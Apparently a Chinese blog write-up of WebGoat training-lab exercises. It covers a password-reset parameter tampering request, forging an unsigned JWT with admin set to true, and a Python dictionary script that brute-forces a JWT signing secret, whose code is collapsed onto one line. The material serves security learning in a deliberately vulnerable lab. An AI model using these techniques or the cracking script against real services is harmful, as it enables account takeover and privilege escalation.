webgoat靶场复现
1、安装
github:发布 ·网站网格/网站网格 (github.com)
新手篇丨Web安全入门之WebGoat8.0环境搭建 - 知乎
Broken Authentication(身份验证)模块
0x02
newPassword111=aaaa&newPasswordConfirm222=aaa&userId=12309746
JWT tokens
0x04 Background Unverified Signature
转到 JWT 在线解密—LZL在线工具 (lzltool.cn) JWT Token在线解析解码 - ToolTT在线工具箱解码 jwt-token,然后将 admin 修改为 true 并使用以下脚本重新编码标头和有效负载,不添加签名部分,发送请求
jwt 安全参考:
http://4hou.win/wordpress/?p=23278
https://zhuanlan.zhihu.com/p/71672282
https://segmentfault.com/a/1190000010312468
0x05 jwt blasting
参考:https://www.freebuf.com/vuls/216457.html
在线验证:https://jwt.io/#debugger
实际上,只有几个与jwt相关的问题,只需尝试一下。这是暴力破解的密钥。github上有一个c语句版本的暴力破解软件,但它似乎一次尝试一个字符,所以它非常慢。反正我没有用完几次,几乎卡住了我的电脑。因此,我们可以使用 JWT 库自己编写脚本,也可以使用 github 上提供的脚本。这个python拆除脚本是基于字典的,所以首先你必须有一个强大的字典。我的字典不够强大,不足以让我几次不拆除,所以我只是去源头并翻出一些秘密密钥添加到我的字典中,"victory","business","available", "shipping", "washington"如下所示:
Blast脚本(您需要提供自己的字典):
import termcolor
import jwt
if __name__ == "__main__":jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTU3MjY4ODA3MSwiZXhwIjoxNTcyNjg4MTMxLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.2n1lN_F-Pk8GXxw7nAneMt1C4ExfH7mVdtQF9nMKhVs'with open('/opt/burp/pass.txt') as f:for line in f:key_ = line.strip()try:jwt.decode(jwt_str, verify=True, key=key_)print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')breakexcept (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')breakexcept jwt.exceptions.InvalidSignatureError:print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)continueelse:print('\r', '\bsorry! no key be found.')
解密打不开 以后在做
参考:
Java代码审计入门:WebGoat8(再会) - FreeBuf网络安全行业门户
webgoat靶场复现相关推荐
- 渗透学习-靶场篇-WebGoat靶场(JWT攻击)
文章目录 前言 一.介绍JWT JWT令牌结构 获取的令牌的基本过程 二.攻击方式以及靶场的搭建 1.安装cWebGoat 2.空加密验证攻击 3.字典爆破 三.认证-键值逻辑 前言 本次主要学习了j ...
- webgoat靶场通关记录
webgoat靶场的所有的源码审计 以及详细解析 想要打靶场的可以看想要,学习java代码基础的也可以看看 github项目地址 https://github.com/wanan0red/webgoa ...
- 靶场复现————平行越权、垂直越权
知识学习,不能上升到现实,确对不能!!!! 什么是越权? 越权漏洞的概念 越权漏洞是一种很常见的逻辑安全漏洞.是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关 ...
- JAVA代码审计之WebGoat靶场SQL注入
文章目录 前言 WebGoat IDEA部署靶场 No.1 回显注入 No.2 布尔盲注 No.3 Order by 代审技巧 SQL注入挖掘 SQL注入防御 Fortify体验 总结 前言 为了从自 ...
- WebGoat靶场搭建及通关记录(一)
文章目录 前言 一.搭建靶场 二.通关攻略 1.General HTTP Basics HTTP Proxies 2.Injection Flaws SQL Injection (advanced) ...
- log4j2-rce 靶场复现
log4j2是前几天一个核弹级的漏洞 现在公开的靶场有vulfocus.bugku http://vulfocus.fofa.so/#/dashboard https://ctf.bugku.com/ ...
- log4j2核弹级漏洞靶场复现(反弹shell)
环境搭建: 本次漏洞复现采用vulfocus的log4j2靶场docker 使用Kali系统进行复现实验 搭建docker拉取漏洞镜像可参考以下链接: https://blog.csdn.net/we ...
- Webgoat靶场搭建
环境 jdk16 安装 下载链接 :提取码:9999 下载过后是这个jdk-16.0.2.7z文件,这是个JDK16的包,进入bin目录下,可以看到靶场文件, 启动网站 打开一个cmd窗口执行启动网站 ...
- vulnstack(一) 红日靶场复现
说明:关于该复现中的问题欢迎vx交流:Bestboysendit 目录 一.环境配置: 二.内网getshell 3-(1)phpmyadmin 3-(2)备份文件: 三.内网-连接 1.基于MSF ...
最新文章
- R语言绘制Vonoroi图
- C#:设置当前线程的区域性
- 【 MATLAB】Subspace algorithm Simulation of TOA - Based Positioning
- firefox兼容性问题
- Putty中文乱码的解决方法
- 写一个测试工具类,只在debug时运行,而release时自动移除代码,适用于gradle项目(idea,android studio等)
- Hive hiveserver2 配置运行
- eureka架构图原理
- 事务管理基础:数据库的并发控制相关知识笔记
- java 利用Future异步获取多线程任务结果
- Oracle、MySql、SQLServer 数据库分页查询语句
- ZOJ Monthly, March 2018 A Easy Number Game
- DMS经销商管理系统解决方案
- 计算机程序员 面试题库,计算机软考程序员面试题精选题2
- 为什么Web前端工程师薪资越来越高?
- 青龙面板扩展定时任务——九章头条
- linux课程--实验二 Linux 基本命令操作2
- Spring集成JPA提示Not an managed type
- 区块链学习笔记15——ETH状态树
- 替换空格--《剑指offer》